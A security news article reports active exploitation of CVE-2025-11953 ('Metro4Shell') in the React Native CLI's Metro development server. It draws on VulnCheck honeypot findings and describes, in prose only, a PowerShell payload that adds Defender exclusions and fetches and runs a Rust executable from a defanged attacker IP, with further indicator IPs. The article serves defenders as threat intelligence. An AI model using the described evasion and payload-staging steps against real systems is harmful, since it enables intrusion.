Security researchers have observed active exploitation of a critical vulnerability affecting the Metro Development Server built into the widely used @react-native-community/cli npm package. According to cybersecurity firm VulnCheck, exploitation of CVE‑2025‑11953, also known as Metro4Shell, was first detected on December 21, 2025. The flaw carries a CVSS score of 9.8 and enables unauthenticated remote attackers to execute arbitrary operating system commands on the affected host. Technical details of the vulnerability were initially published by JFrog in November 2025.
Despite more than a month of confirmed in‑the‑wild exploitation, VulnCheck noted that the activity has not received widespread public attention.
In attacks observed through VulnCheck’s honeypot infrastructure, threat actors leveraged the vulnerability to deploy a Base64‑encoded PowerShell script. Once decoded, the script performs multiple malicious actions, including adding Microsoft Defender Antivirus exclusions for both the current working directory and the system’s temporary directory (C:\Users\<Username>\AppData\Local\Temp).
The script also opens a raw TCP connection to an attacker‑controlled endpoint at 8.218.43[.]248:60124, requests additional data, writes the received payload to a file within the temporary directory, and executes it. The downloaded executable is written in Rust and incorporates anti‑analysis mechanisms designed to complicate static inspection and detection.
The malicious activity has been traced back to the following IP addresses:
- 5.109.182[.]231
- 223.6.249[.]141
- 134.209.69[.]155
VulnCheck assessed the campaign as deliberate and operational, rather than exploratory testing. The firm noted that the payloads remained consistent over several weeks, indicating sustained exploitation rather than proof‑of‑concept activity or vulnerability scanning. “CVE‑2025‑11953 is not noteworthy simply because it exists,” VulnCheck stated. “It is notable because it reinforces a recurring lesson for defenders: development infrastructure becomes production infrastructure the moment it is exposed to the internet—regardless of the original intent.”
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
